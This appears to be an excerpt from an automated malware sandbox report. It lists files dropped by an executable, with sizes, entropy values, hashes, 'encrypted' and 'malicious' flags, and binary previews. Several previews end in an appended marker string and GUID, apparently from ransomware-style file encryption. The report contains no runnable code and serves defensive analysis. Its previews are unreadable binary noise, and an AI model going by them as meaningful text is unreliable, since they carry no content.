              Preview:{. x.-8.1...._}....@wE'.I.8g.dy...2......X.+..J.b.`.S..=..C.l.........g;..N.z.moN..ms.K.h..*.a.Y...-. ]..k....>U.\p.wBk.#.R/..^.4D..}K*....GV#........L.....B..7.Mu@..,.F.D.......c.U.Z..2."./.r-..c.}.4I.6^k.J.G..es.b|..nh.6.o.e....1b.~.a9|.>A:dp...o..K..@[..?..k.....^'..[h.A......S...(P..mx..Q.TH.....'ir...+..X.;.Zb ..}Xs...XD.`$.e..R.F..U...T.i.D..+I..j..ZF..l..'.".vn..h.._$"..up.......&{.\B...{..U.. .FEA#.g.v...d.....mt..8..}v._OY.u...6o.@.UW. .. ...1..c8.aH'.[_.+I..7.O...Ro..a.f...7....8...r{..U.`...b..Z........S..s.....L......Mv.|..B._.....T7.M.....gi7_..p..\..W....;.^..N.x.!..a.$..Vf...P...".ZD...O%..A.J).."..H...h...U.44...].-.......DLf.Z.h..~L.ew.B.e...}l......$N.M.!.J.].o....a.c.o!...4x.}9......E..`.Yo..a../......$:.H...8...5..Z>/U..N2..a.d..,._...b.....(/.A.....=....n....O[X..w.._.v.x|..'.,&...o.l.s0>..C.........Ym...d.m(!...0m..........2F.*d..;..q-...P...qB....\M.M...\....7.....r..-.]s..*,T..CY.eJ..L.. o...Tk..`2..'..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):148627
              Entropy (8bit):7.998790026014686
              Encrypted:true
              SSDEEP:3072:i4d/m/kK+NWLQllRIEhWIt8tO8lUIjhO0N3kjvUTo4O:Pde/9+NWLA9pt8TlUSoSkj20
              MD5:917F8A4DAAC81BD3825E0AA95558F9A8
              SHA1:A119C123202F5B5E392B85CD342C714F76B8BE0F
              SHA-256:BAB964B4EA512BED1DF5872C61D64955C3E8BD6AD4516BBA24D6D612CA9D4734
              SHA-512:016D180F131FD78F817E4F9D6D95208EF45ED9B53E7E50FCB6A890C65BCA861E545DBA3E85B6B375D545D06DD89DB1A861BB07B1B887B311CF92A9984EF2946C
              Malicious:true
              Preview:{. C....L1/....6mS.[YXL..V+y...Nv..DTs!*..o6a...&.l9.f-.J.(...a.4xr.!....K...%.g.w..!iU..{..\[J.K.).8A.;.5.v........p..k...9.B...4..z8........(.E(Sq.0q.o.....w..@.y...P...rq.'pf.......w)..o.Q-{WM....0..].|Mi."....Z.?LbR=k..1..'r].p.D.....z..,Y..|Y.[w..._.I4\k..NT..l\..'.....5.N..Sw......B.H.1...Z...k..8](..?u./Y.Tg6..6,..CK\.#!u.N.F...;k-..$..}.1.X.......+..........!..z.x...kd.4..b...+C.Z.~t.kC.......12!...PO{f".....D.^.4....m/3..b.<TK)@UO.yUx...}.3#..7Y.>C!...>..DP.....n.bd:W..*k.k.....Z...A.~...h.)...V......U...I.b.. ....._..M..0..3-3%.J.&G..S..k......~8".B....s.z0p.;s....N..n....8R.....FZ..i.:.K.m.l..?......CC.}{k.6.X..S.S...]Z...OL..."P.NgvP.X.#.Do.+z..g.. .2......O..._.$......$$..9.e....q.(z.o.C...9..]..;.>.O.r\vvUp...s......-...#^....oK,r./GV".s|...#.7.....B.'.S..|.....r..GoO...f.2.8..h.c=..hV...I....}..p.....A...&..S[..%5..vc..W..E.....Y3%:R,P=.o.Q..{..".....Q[.dc....G.WS!..5....`@W..,T.....B..^.F.v4"b..Q...nn1c....-...."{JR..+w.r.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):511701
              Entropy (8bit):6.017841862290632
              Encrypted:false
              SSDEEP:6144:kogGKytLANbR75UyWXKR2jxf9P6jY2mWH3+klkfzTOJHYUbHG+FZ8QTHNGs5AeC/:Y1qLGUyKjxfdM6bfoGQ8+ee8
              MD5:7B2A0B2B318C0F2041A50B244526AE0B
              SHA1:4B7940371D8FB3B0223C397D0BA17CB7268A5009
              SHA-256:30C845E50C1994E92586176A703E49C048D5E007E7BEF93308869106920B2760
              SHA-512:36020171C9754F64A5C32680F0721F6761D93BF3EB318C16D064B9D5DBD92F32DB7C74B5CB9DB4BC02FE590C1D9324F4B69E4A0EAC0D4632F2D083D25FB40D3D
              Malicious:false
              Preview:{. .1.'....<P..X...N.].=.J.D?.&.".i.aH.....`..?yE.%..C.._L..U.....1;.+.....X.$...."aC../.8(.]..7..~..b.a...!....?....M.n.....U.ncZ..7.P.t.Ys.6{..V.....n...9..C^Qy...p..../x..Z...r).17.)..NP.I..BSo.....VS5I.......$..]...l.{2...X_...Y.;1.<.....c..P..O....X.[.6S.xO;<i.l.....ql....CV....{=...*&......jx?.l.5. ....pF8......1}+..]...{..+=F'...|......y.o"`.....Sid..\i?1a..a.......U.UF3.....Dj..$.M..p{...........)..,#..........`9..B.....d..H.".C*).kX8..u..D.........q....P.$....np.J&1.>.l..z..I:O..........A..90.....6Mg....5`.n.!..Z.#..8.[o..^{-..Wl.Ja85...d.j.P......wlk.2..59.....l#FG...H...-$%..n..).....#..5n.5........d%)..T..8......u.N.M...0.S..RJ2.A...F..K...@..e.k..a....[>v<..g...M....u..}tt..xp.a^bv...g..".....4..$..Q..?kw"...~....Y.%.!.../H.........v.\.o.U...#5.D+.qh.;..I...i......E.dR$.p.'.M.d.M'..(.q.EXS.}.yE..tA..xfH,#..\.Y..DR$..-7.{M.].t..Q...J.<.|...=.6.eY...k.C-.K..4.....N.vn.Z-..8I.d.....b1.....Na..\|...LG..:.G....].... .
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1060
              Entropy (8bit):7.793217723582458
              Encrypted:false
              SSDEEP:24:Lg6vkvLcR53REbhgjG1X4nZzz9BGc4xwrU5XPQJSl3VwT60FlS4Yucd+bD:Lh8v8kirZ/nldxJg3qS4Y38D
              MD5:ADCB80A30902230622B628BDF265B625
              SHA1:09C56245B8AC6624864FE114992DFA7F94F3474F
              SHA-256:1C592EAE9AB4C500BB7F722348AA75E3F258994B121EEC165655BA916324CFBE
              SHA-512:9234655C3F558950B14D2345F3DE9C7DF949C23D108FDB7CA9ED3335FD319062A10BE4D9A85D3E9DC8F9954F7E15C0C8E56BC09098CD5A71F0088C40A7D1FB32
              Malicious:false
              Preview:{. "....V....9.......Tmp.Q....=..<.R.V#..K../h.JwE......,tN..n.\...k.g...g.qV.G.6+.p)...x.K....,.$0..~%T...l.L...7}...~G..C.;...u..5.,....'.JW)=..=...21.b.@0'.F..}...6!...(M{.n......5......j.NBl.}..e..c....2...>hR...fqMb....>.....a!.K.<a.yZ.....4.9..q9S...m....."B..Z.k.....U.R%$Ht...W.NKo....N2.....n.`.W..dX.H.].,.....f......6N......I.?R.SO..G...3.YZ(:.+.....2)...I..]...e*...C!_...*a..0Z.%.~.D....r.%...{..[...,..|om.'...+.....d..{....*.U..I_......\..^.......=TNvk...H...g.7dQ.....L...*]...gy.4P..!............[.$.G.N=.u6.1.c...1..(..............HK. x*..Z...........$..C...>q 7..6.+y.c.U.g3.E.5.:m.D....^.w..)...[u..g....D./5...5{..N.........X&...e.y.@.(.^R.?D...N ..-."....."3. ...... ...,. .e..^/&7..<5.WD..q.....bE=..0.&..~{^U.._.q.K......@K.X........;.....7cF.+..*DZ...`.6..#......._..;...+7r...VB3.,.B=.@.g....^.%=....SK..e..=....+w@w...g.OX(...@.3.T...Rq..~W#..B.-o.p#p...C.....9\^..^..."....R\..k..z....../.|..p.t..+N.#.U..4.gigF2ELYocnMQz77Lh
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2333839
              Entropy (8bit):4.657218106227664
              Encrypted:false
              SSDEEP:49152:bsgqbHFYSiXPjpqxbq9emiTQuyg7oM2e8P/bzEz:bybB
              MD5:4B9B815FD01300D3064F9553E507DA50
              SHA1:B4152FD5D50A1690E0EE4F2A1D3DE8CEB8E55790
              SHA-256:D366E0E911B871BCEB89A4DAF0DFE08D0A7BA71C933169727F2BBA1C3A962FC2
              SHA-512:DE810A0BA7E406232B7861560C54C6C5ACE35FD0390C84ADE6CB7F4FAA5C6F8301526411AB0AE13EEA6BB83F29B5EB7DB7AE829D1CEBC627C36D7D880D522E70
              Malicious:false
              Preview:{. "..>U.._.....#....u......{..y.6a32...F@...........j...GD9..BO...Oc.{...t....,...G~..<.Z%e`j...>.. '._....V....iHi.*4.v.|d.U......*]f...9'.K.D...g1.G......n{....Ei=........u.}....3.HSfw......`M..!.A.}F.au;...}...........~.,Y.d....TE-..b[....'..o.gk..3k.y.M. .L5.....Yz.T.9.e..g..H\........4..{.9K.q.UN...(Xk...G.....]..3..+b..=.JM.B.J..4.h.".gv.....]..oP(p..{.+D4.o%....i;......~..j.LIW`f.=...X....=.++.Z....l.w.9.F).t3(.H1.,.\..._v.dp....1..I!......&....^"+#..-...@.."..L<'.......%.....A3@:...v.'7....$........~..Y.f..D[...sKX..Ub.)^\......K.I......y...R...y...]"R{O.3Jgk./.U:..))2..%.,........?...5..%..O@..l._..6.SM....~9.../..gm.(^.B.^Z..y"....?.o.*.df.e......pw.T=...,.gmK..~...7........q).`G....x.....)..?;(...Us0..I#....0.......ZD............[o...'UO..m..^..`.uJ#|......P.~]?.Q...Js]..GD..<.....6...ww.}M.yZx'..5F...9...@.+..:..q..LXg..O..>V]..8@.z.2p...4Y.`MW....2C.z.$.0.9..;..'t!.GS.....X.......^!..\.;.....a..OL..c.qs.3r..x.8N^H
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2333839
              Entropy (8bit):4.657232558263013
              Encrypted:false
              SSDEEP:49152:4VFA7FYSiXPjpqxbq9emiTQuyg7oM2e8P/bzEr:4FAd
              MD5:7E776D55C1418A9BAEE67F5FD2109106
              SHA1:B91358BAACFFAEEA3E6DC6A7AE5BAE5FF564D8F5
              SHA-256:9643FB579BDC595F5B1EB68B164E968BA4DCBF2856820560B1568A9BB113E967
              SHA-512:BE452D5811E01DE98D92564AB070B173A00BFC9CF949C38F812B003E782F762ED9F3FD5C64061DEAAE708B176125B73807754E278A58FEC42FFEAC507FB9D77E
              Malicious:false
              Preview:{. "...!#B...w.L.+EcS..E...3...."x`.=.........Z..,/..x.....p.H$.&.)|..Z..c....V.g.".....M7.......pX.......=....w..r.....3%)~y'>T..~S...z=.au..).....)!).(.{?.;/.\7y..5.V...\.b.?.^.S..o..+....Y.'X:....:>p.......q.N......!.}. x...z:.;.....a.83..4.l. -..$......l...].W..$... .H....W....7N$.i......>......):.m..&1Ow..@.j5..0./..^_,.....{{...+.df8J.E).j....<<.M.j..+...}.....+....l1.E.Fc......$..\...I..p...v..3...S......n..{.E.....b.b(.AK...kmk.7UrN..o..]. .3.......f;m..I=.+O.>..<.\nfJ..-i..Z.....T.i.k .....|._H...1.I...J....Q....1?...U.O#n.y.?......7.y..[D....C.>,.wR^......U.01".F~+..;...C,.-. .$.OY........F......J.v....`..V..E.......s."@.H....N.)e. .<..I.h.;S......,./.c./........!.'L....OD...O..6....u|....2..*..5Z.k*O...Nh..cuJ.!.....y5v./.y+..#.y.1u,.a..T0.GY.1..~....zOe...J.....h....@. .*L....W..P.@{0..P..M.M..0&x.4FO.....;...~0.3.<.|.]nD.~.....M.S..9...9.....:s.O....s..r....D....#}F..P...)./#....F.o....b.!V.L..4....../uT.[..]...X...|.c.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):24582
              Entropy (8bit):7.991958081417155
              Encrypted:true
              SSDEEP:768:2VPk3wOHPwRC16+tcQ/OEf7PIVgAlm5Oi:2CwYPwoxcQ/OEfOVmZ
              MD5:B4D33DFD5C69BEE24B38BADB460BEEE9
              SHA1:F13DBB63B4E4CBA3E52294B7C2FB0FE8DFC5DF78
              SHA-256:6602D31B8316ED53076522722B1F619F40A105B74A6A6EBAA65CEC203CEEAAA0
              SHA-512:F3F8E346C196615C7E120F4B42AA8309D9A08948B219358265CB223BABD14612A4FA369249A1664E79970790B1AB61C999219560C70D457D66449B1505D1DAEA
              Malicious:true
              Preview:{. ".._..&V.C..C...yox.NSFu.h.c...<.N.!!.2.P..o.k.).{.H.]9.G.#..R.{..#...."...".3.#.*:r.5.:...it....wCo..K...?@dPC.#...w3HF..........q....;A.i...W.`..t.!9XA...e...a.~.W..>.I.l.....Uwm)... `.......K.[p\e...Oo....r...F.h.1......rLO....roC..I.S.(........Q..p..5...y?4....Vj....R.f.:...zY.n.Z.TN.KEP.xx..c.j.}.rO......r$.r.d$....z....B<~m..T...Q...L=.Q.k......U".v........,..-..az..v.....A/.(.....LV.hX......+.l....z..C../M*>...*P.n.Y..w.5I..rS.s.....I...*6d........[H..OV9E....,:..S...F......ZAx.kf...y<8..;....H.J..".Obi.&.1..."i.M.%8..KUR...lW....w.:..R.[.@/........b.L.S=R...JK.mJ......H...<......L..&......M.K.&.Y2..Y9.4:s.Z,..q.|/.`....*..a.E.....u.....'......xC.{zA....o..Y.RI......1.,...X...R.Q........."..X2.w!.BO*3....\..^.x^..\..{...q.....]W.-5.u^.23.......-....LO.h7]..t8..\..t7...,....#....m/9..L.>.!...$...-0...]..fs.Up...z....j.X9.k...\H.....Jrf..!g%.f>-.UfF.$.0".E..*..>.4YXu.)..3k."...#O...r.q.$.".?.>m2..Q.......V...Ji...zV1...*....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1666
              Entropy (8bit):7.884238501814229
              Encrypted:false
              SSDEEP:48:hp4MH2mu+foz42lgc5HlOo7Gf7on8MzD3KjV2u8xtv8D:j7JuZz42lnkoHKZ2u8LQ
              MD5:3E481BEC595E49F97791BD347FAC2FDB
              SHA1:C3B25B52EE69120A6D6D3A6E4B3FEB65A7F5667B
              SHA-256:A386F61D95F3F24AE1652BBE5FB2C8DD64DC68FBF1CFE9670544DBB4657812F9
              SHA-512:0C00ED1D2A557D4AA05E41E85D3FC9B4F627AA0F4BB0E4FB4779E5E1EB0E642C3D87B8964B386C5D16672BC83853B8EB19E3A59C5339422D361D6971D1A0576F
              Malicious:false
              Preview:"use ....<....B.~A.MG.W._.{..u.!f.......\..ff..XB..<.....5r......IyML.t....t..l.?(..?.Y..a........t............Y....m">k ...........+.M|.V.I.X....a...h}Tk\..H..p....=2x.y.:..615...c....y..o..xd..! ...Q-.r...6[Rd..Q .W.\..6..Z..~-...!.....W.Z......:.)...UUs..j....)`..J.)i.Q......I....9b..jY.r...a'...n!....'.&S}..=a*.E...E....RZ.a.........R..h'...S....&p..........w....Pa.T.....w.-..9..k......UJ\[..\..n....>..m.....~[$..gA...].T.!..x......-......O.L];`..t....../.:.....n...y....'....`H..M,T..s...1..p..O.......NZT.qOX.H9.@.^.~....5...MR.V.W.A..U..,.7Q1.=pM?...W.W.f.Q....]..DFL.mt<.a.z..cT..DB{...L....d...B-...q.lZ...ylh...p.=K.?......k;MW/.X.=.Y...?p.O..+.8d....@.....P.].....W..|%K...&9..G...PV#..E....<..x./.N.........*..B.\.P....dTA.+...N...<"j.vS\.y.4;IL.)^....k.~@'+......,.r..$...b0.?.LY.n...Ze....L.V}e....Q.l.V)......W...O...S....\y..".0P..c..!.....(...V.x....uD.q..... M_.8...=... .5...."....c..h..k.s/..t/e...ti....m..|.7._...}.V.F...n...E
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):400
              Entropy (8bit):7.414013612542
              Encrypted:false
              SSDEEP:12:ly2bqfKWAE6FralUBTJ6X3qTU6fQLdxa3cii9a:lyWqfKu8FT/fqd+bD
              MD5:A918F97A11707E6BC7F50620454AF4D2
              SHA1:CBC8777D57F4D6342B5DC9BB2911B994CBD03CC7
              SHA-256:5F7DC482FA6D14A02B17CEF92DC43D7D4E847F83B4E296E4399F928DFD960ADF
              SHA-512:B6A6B64E053AA9D16E8D3402D193BB84E194EDA41A89EF4572DFC47C61C70DEDD1F9FAE33C569655699880E0C1199A87BF02DF295320FBE8C7A612A1D20A1DFC
              Malicious:false
              Preview:1.D38cxw...S@'...Q.e.w......{&M.i..j..0.&.X....KX]7.</a...{[k.=......;....66"..DJ.w.....N/?.... wt.....D.......*sDDJ.o..._.)>...%pC.j6..*....N.Z.E!...rsg.M...l.P...>..k..e.u.R.......Y9.~6.B'o$........Q^.7O...&!.>..O^G.....S.8T......K./.M^[; ..^O..%...^h........?.8.....r .C......H....I].\....q.c}..i.:.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):456
              Entropy (8bit):7.402333909489975
              Encrypted:false
              SSDEEP:12:MoWhHFXXIFQKBQuBgxXXpqJODdgjGC7dxa3cii9a:MoiXXIQgQ4u5qie7d+bD
              MD5:59D9F2DF54446DD53A82E29CC767C84A
              SHA1:0E440AA40807E86E00EEA9C4E514660FAA81F0CC
              SHA-256:9CB199821A9F6AE04423CE6C092781DFF05A5385DA0028590C0640430334F4EE
              SHA-512:A2150D23DA6834F2FF95961485917828F8D367DD351827340FE9BD3D678F3BE97BC4CC1961CA0CF6948F712F31556DE8D4FFD2201E13171E2342A715C76ECE1B
              Malicious:false
              Preview:.{.t.......;..t.....s2. .?#..(...@...Af...F.[N]R).~.d:).5..+q.j.#%...%..Xxy..s.o"2..l.Yai7k....6$.J.60.>.V.(.U.J...~.V.yk..d..`.._....;.X.....m...F..l3M.s9.E.P..w ....F.\.....S~w,..KM4a-.......~.UZ.]6...<.u.NL....W.w..O$...HiH1/6Fb..7.43Q..j.....l.gbmF...!..Z.b;..d.4.Z.4c.0.....`V..}....X.....o..{iYK.)...L8v.qX3....../7.c.x.-.y....b.cN....'..V..."....L.W0gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):653
              Entropy (8bit):7.6803269467761055
              Encrypted:false
              SSDEEP:12:9WDLnikg0J/ZN3qYN6aF/Eiofc+5LSa05I9oWBo3twq9sdxa3cii9a:9wvVZN3XF/xci69vxq9sd+bD
              MD5:89BD56660720FEC958F194DD83AC500B
              SHA1:10841AEE3B2D0FB57D6334149654699662530ECD
              SHA-256:0EA3586904AD0852B07BC7DEAC6A77BEF3E751EBD7E1D3155799077F4A0E904B
              SHA-512:3019932605E2B14F733E19B0B1CF146A0426B82414D59FE2204504CD3DCFAC08DE5B7D04C18D20B56EBB2A2DCB8E8000FA56C84346BEE105E6475255757118CA
              Malicious:false
              Preview:.{...m#.Y.....i...w.V.....|.... ..,`..5[&. P.........N...gq{.mL~..'.....\.....JZ...W..'............4Q%.....!m.?$.Nh,....a....P.sl\.........o;}...V...........R.4..).....V...YHRgz..,B..,..L.I..Z.X.G..x...$*@.z;j......k..i...<Ce...h...W....C.9n.`@=im..I.._.~.......(-.....Z....R....G....G2.z:a(L.c...2..E.....g.A.. c........7......,.!%L.].&...3t~....enMs..Sy..ffd.......A....y.....H.n.t.{...:+.....^...rv.....a...tnp..<.j.x....I.I...i..[.cq..{1H..M.8...L.+.^.@e.3....R].m..0.Y.%G.+.iY..o...[.:.!..a..qxM.X.....{...O...-;.@..Bv....`..V.....K..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2476
              Entropy (8bit):7.916756483713155
              Encrypted:false
              SSDEEP:48:78+UgvqFAOf3Js3rK+UQECXxOlh8qZtqzQALmSic+qc5xsS1ymr5F+Jy6iqo8D:7zUgS/fDQLqOzUbtsyGyRql
              MD5:EE0E70379B8C90110B7FBF07E170DD69
              SHA1:1138296673C5CC3FE1931CF1DB4639AD28192A55
              SHA-256:A339043B701BDFC0733A3E2DC78AF74DC587551D2E3D20E90170006862EC9E1C
              SHA-512:63B971A8F40C019A4CA2372615AD74D0E830F0486BEFE1845475E4ECA864D79661B17C88C47E0D026D21BEA4A475CF9A8A50D62B1A258EA4D5658C63A4193ED9
              Malicious:false
              Preview:(()=>....T.x.|G..].s...s....=.z.b6f..[..A.r..J...~.[N._.c....X\.i.. S.....K.l.u...[.RM..........>.!.^..g...3...t...+...O....K...8.TC.D...........M.S....Zn9.y.tWZ..sm.........S..7..[.NO.....H~7.?..{Rsa..O..K...X.....1..I2..K~CCn..5....u,....B.....s..po}..?.j.q/G)w`.O_.....n...t.B.._ .....wF.9..\.eU.z..=...`.......!\.;...<.}..z.3.=....0.......;.GR...QW$q....?.?..J^..R2...j..S..>..J...........Y..IUOvM...).@{.I..d....s.U..:.Sh....&.p(.(|Dv.F(.....yx................6.x.wF......'$p....LL..e.0.f..l..dka..b..n...7...Z.....o..esg..|d.L..d.0...1>*.z...c<........k../.E.:..q..."z.._.\|#.PEa.D..f.0..`f}..>.7....4o9F*..w$.....H..{F.Y..I.4...B.r.N.\.Yw...;.Y.s?0.-tS...}($......x"...@>...v:DQC.49s...J7..@V.Jim.!..fg....h.#.....QN ..-..*I....W...c.vP?...\....Z..Zn.@&h.....VI.(........w..CI......e` h.z'T..=...M.p.0.a_2...m.....!.d~..t.:.r.~...z!P50..\.v...q..fzqF......8.C.......|.s..?...ER.T..V..W..V.|.mx..Xn....&4...ok.Y..M.0V...?...@NI.L=...~.4.....;.[.v.x
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):28957
              Entropy (8bit):7.99433262833787
              Encrypted:true
              SSDEEP:768:DooxACZVgbFi6g6yQ5wt+tKHeMh0Q1UGAQgVrZi:5v70i4Kt+tIefDy
              MD5:5933DEA423328A0D44229D2EB5D5C520
              SHA1:12637ADF387E36016A9CEF8D48D6D9D2FA6EC5DA
              SHA-256:321B5EA55448C7DC27D8A3A20D01FEE01A17D67BFCE9B0015B81CE3AB284F70E
              SHA-512:5C8F802891A429DBB795B314322DC99EC3763468412825A4A388C80F091EBF4A7E515644DB921879603C0CAEB15EF5D9CF24E1E45F5A230AAE52586036924508
              Malicious:true
              Preview:!func..0...j....S.9.,r..S......v.hz.....`..<.....Q.4F..}{...hF^q..t.acB.g..{.2K5`.J.E.n..0...[n.5...l......e.I..+.....m.z?P\Fm.....c..&.h.7}...v....._kr.gJ...%%,.z\0.w.--..[.3VC..D,.oC..{2...:v.....M..C.....1.......M..EF..K..".......y.:.F..o..RS.EY.. ..0.>`. ..W.,.....{S..@........M.X..c..*..]./...y..]Y.....3."+...*....rO.XmP...q.5,..$.^....S.y&...J^....e+K......'.g'}t...,r. .z....SqR....s....,..9..m6..z.(J..r.9...\Ia.O....M.vD.d...n.....p...p TRN.......80.7...8o......"U ...ls.|.u..!.2....hp....4;.......8&.-.k..~u(>....H5.....oq>..D^m`t.../O.A{...~..,n. j..mp|K..xZb.J..#...]......S.%lFF...N...1=.@..j...n.B.)...A.m.......0$.P_.m.>>..>.7(.............>M...g..._<N....7....:.X".......kE.B...-.v&5f...\....x...U2...>t..K0gQ.6..C-.....N}.ibi9..4......D...".0Z%........J~...0....I...........ra.L6.......Mov:&...f\..~q.....M.?..-.A.>..9......Ac.P.w...z......}.L...|.f.....`.....#.E.0......E..$.....w.%R..."".}....].z....D._.|... ".axW.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1441267
              Entropy (8bit):6.075014637375534
              Encrypted:false
              SSDEEP:24576:TGSYyeYjuxvUMriDrhm0YOR/jnKZ2FWsfI0fYFQhMjh5AkJSe3J3kJTEjucy2fQ8:TFYyeYjux8MrYpYOR/jnKZ2FWsfI0fYn
              MD5:25294AD569445C3DB45C3F185F309232
              SHA1:82370AF41FF88EE15509E3B22700E94663BDCEB7
              SHA-256:E01DC9A48A2730B26703DB2F5240B29E3C2E2001C714AD38EF54CF735A5B839E
              SHA-512:5F6E38A0B3ED9D54CEC67765377A5F0877F78F7E2A8D511CD338B9EB6E821991A8307F4E75967A7A5D868CFDA632BE988B06D5D4B5E34C938212B6E9AF247B77
              Malicious:false
              Preview:/*! F8.>..Q.D.....T...Yj.NY....P...R....\J?...~....w.Z....._.7.U.uI..f......-Z...../.....[.e...../.'x..fT...?Nw.....0..1..{.hH.>.9.........].T7....m...J..T.....>..?........@4.:S......`....b;.#..*E.8..-N.J...*='.../...*.K.LF......v....i.;..PN.H....^.q.........VA.....).r.s\AN.e.0.......9...N?z.W+B...Z......F.{......7...r_F.......b3..G.N.G.R..w....y_..ax[~.T.......W.my.|.......U..cu.+.@..F...NO..t.f .5..x.....Gg..,(.^.V..._C.D'.w...~L.......1.......19.V..C}.R.v.........".....9.........LyN.}....f..%K..[-.....z2+....&.X.>.X?...3..LE.Gp$.X.. .........I^.3%./()9..wvSF.\_8.&..J.V;.@.....$L=..6..vf...r.a.n.P.:T..Z.....I.*/W....P.................e.o..~.P.......N9._\I.?..q.....E.p..|?sH.<...t.BH.....@u.....a(E.Dya.l0.........up..\............%..i.R..>.q1.+>01..8..8+mv....-.q...p.1X..).:.#H..1.I.1.a...i([.T..$........<..wA.........$.;g4.5..v_..7W.........y.C.td.iG.G..c....&J.E=!@...jo..)3J....I.@.....E*....E+n\...4.t..GN....ng..Q.=.... s...U...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2964
              Entropy (8bit):7.941073932424601
              Encrypted:false
              SSDEEP:48:7o113HXSW7XR6YQ0u6tNdvBPgCJxVMhsTHtKkrC4aUFTSgnL9YhTGVLLW43pV97I:uZVR6YQfGNbgCS2jtKEhhnLy1OKG7I
              MD5:A2D7B3C342A3AD3810B836537E4ED487
              SHA1:038237F95B05DE414F2CF426CA84DB5F380A7137
              SHA-256:12BCBD539CF755FFB5E317C5048C990D7F0815A08755F7BC98728954323EBFCF
              SHA-512:3C621BEF123BF50D94ED48D43B773F6FAD779717C1F6ED2E0840CFFC458DE749088EE4C8F654A1970D3CB9C31E9290265682F245107F242942533F2A0C5174D2
              Malicious:false
              Preview:/*.ob...3.."..k...*.+....uq....W/S.?$n..u:..)e#5..:S..~.|.s...+.J..|.%.=;.....-..m{.......D.UX.&vE+.n..z.q1v..n+v6....".8.....]...e;...ul.:XSt.<_y."u...6.;.U|E..jEp.I:...`O...U.r..<..?].....n@.B=...H.....bm&.p....W..X.qx.s.r.......x&.NK.G.Z.l%.Yk.../.f.Ex..).y...0..... /z.0w....}.c.{.-.M.k....w.6U....(R....S..]bSX.D7Q..bP. ........8.)b^G.;.X.$.i.3|.T...+.._..Q|...._bo{-..UT..+.PxY...yc..P.}6a..jR...^4.).F".w...../....5}..F%..).h.U,e ...eC.....zj....2.#......+-JNnh5\...p....w,..Q...(.M...sF....y|...I,W.........$z$.m.!.k>B.....xC........8...o...v..VQ[X.o.C.^....)...n.$../f..>...U......Z...sy...<}6.v.......q(.N..s2.{E....>c....e#.....<.3..X...v..g...q.q\.#.ug.,q.x.d.d....C.`....G....A.R...Z..L.....}..Fi..^)py..J...X.P....H#M..<R.7..I'.....f'...........%6.i?.....q....8.....,,k>...Gm...X5...U..D9.ie.r...(2.L....m......b2. .".n........`.7.....|....LM.#.XJ4.3.3....F.@.9A.B#.T..d....*k.......`.tA..X`.1....K(;.....bD.:..6.e...*..9..C.....`f.w.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2350
              Entropy (8bit):7.927269702289116
              Encrypted:false
              SSDEEP:48:J3dfHKhIrxwf0ovZs/ZBUtCDaMzzMvJLVfN8YeUi8D:pdfHNrWfrq//bzMR38YRT
              MD5:340C83EC51265D843789DC28609C3B72
              SHA1:827A355FEAB9DCEAD089512F1EC6E8A4234CA2A2
              SHA-256:F467662D4094E0F81E1F507572DA723F93E12D3E5EA95805E864760606F9E7E4
              SHA-512:DA74BA137C81ACA14FC9052A0474D2E7F85CC39389BDF19D40D33E678F8544197F4F05E79F2E2F9E6B0D81DB6969D3F9D399BE7C8C38C966E427DE301E8FFF8A
              Malicious:false
              Preview:<!doc...4....L..s..o..j..44...D..8....N......X....s...>..<.c......~.?...~.5s[%M...0..$}A....-.]......s...`U..P..C.....g..qe.......zG;..S....\...~...sE.e...CZ:"..*..m<..0..T.R..}.%xK.S.d`./.. .J.....Y...-.WX..I..]}..+D..l.X......~..^u..~.zNRM...R.+.....|Q..7J..P....e..!.../.Q..oG. g.t.M.......5...p...N.<...Q.CwJ. ...G..-?)w..c....V..v.@A....EpS..)............h.`...]5..O..6T...E.........y.Y[.K*L .b..kp.bd./.;0V$.b...&..;E....`n.2.........=/..j.._..C}.=JgC-..$l/..4:........%T.../+Q}&...Z.9..;a....~........jK=..[.=n...o.......IJ..':.e'2u.I.,....x..:P.wxI.o..%=.........o....P.Ys".~z....[.<P......s.|.....r..Z...H.6h.k(.....`........._r@...^.J...CX...3,T.c.Yu.X..B..I.....:....b...o.....F;G.G...t/..'B....?./RO....O.^m.3...=WH.$...../.j.......B==..&..:....L.<.4.0.4..y.s.#1/"....~|.MIS.6?..\.%M.Y.5.*.}2.i...m.^."}...3......_...a...G]B....Ht.WF.X...>.#.@..".G..)P.t.%.Y....... .........T?.Z..S.2D.tH...x..8....%c....G..B.............,1.eW...P...l..&..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2052
              Entropy (8bit):7.892760144021365
              Encrypted:false
